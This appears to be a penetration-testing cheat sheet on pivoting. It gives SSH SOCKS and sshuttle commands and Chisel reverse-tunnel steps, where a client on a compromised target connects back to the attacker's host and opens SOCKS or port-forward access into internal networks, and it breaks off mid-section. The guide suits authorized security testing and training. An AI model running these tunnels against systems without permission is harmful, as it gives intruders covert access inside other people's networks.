Pivoting

MITRE ATT&CK, Command and Control, Technique T1572

Pivoting with SSH

# Pivoting with an SSH SOCKS proxy
ssh -D $port -q -C -N parzival@$ip

# Pivoting with SSHuttle 
## https://github.com/sshuttle/sshuttle
sshuttle -vr parzival@$ip $targetSubnet/24

Offensive Security Guide to SSH Tunnels and ProxiesMedium

Setting up a SOCKS Proxy with Chisel

1. Download the latest Chisel binaries

Note, you will need the Chisel binary placed on both your attacking system the target system.

2. On the attacking system:

./chisel server --socks5 --reverse -p 8000

3. On the target system:

.\chisel.exe client $attackerip:8000 R:socks

4. Observe on the attacking system that the SOCKS5 connection has been successfully established.

Forwarding One Port with Chisel

1. On the attacking system:

./chisel server 8000 -reverse

2. On the target system:

# Listen on Kali 80, forward to localhost port 80 on client
.\chisel client $attackerip:8000 R:1337:127.0.0.1:1337

# Listen on Kali 4444, forward to 10.10.10.240 port 80
.\chisel client $attackerip:8000 R:4444:10.10.10.240:80

Verification

The easiest way to verify if your Chisel connection was successful is to run the following command:

ss -lnpt | grep $localport

Interaction

Ensure to remember that you will be interacting with localhost after forwarding a port. For example, by running

nmap -sC -sV -p3306 -n localhost

Nmap Scanning through Proxychains

When performing scans on the network through proxychains it is important to use the -sT flag. The following command demonstrates an Nmap command to use: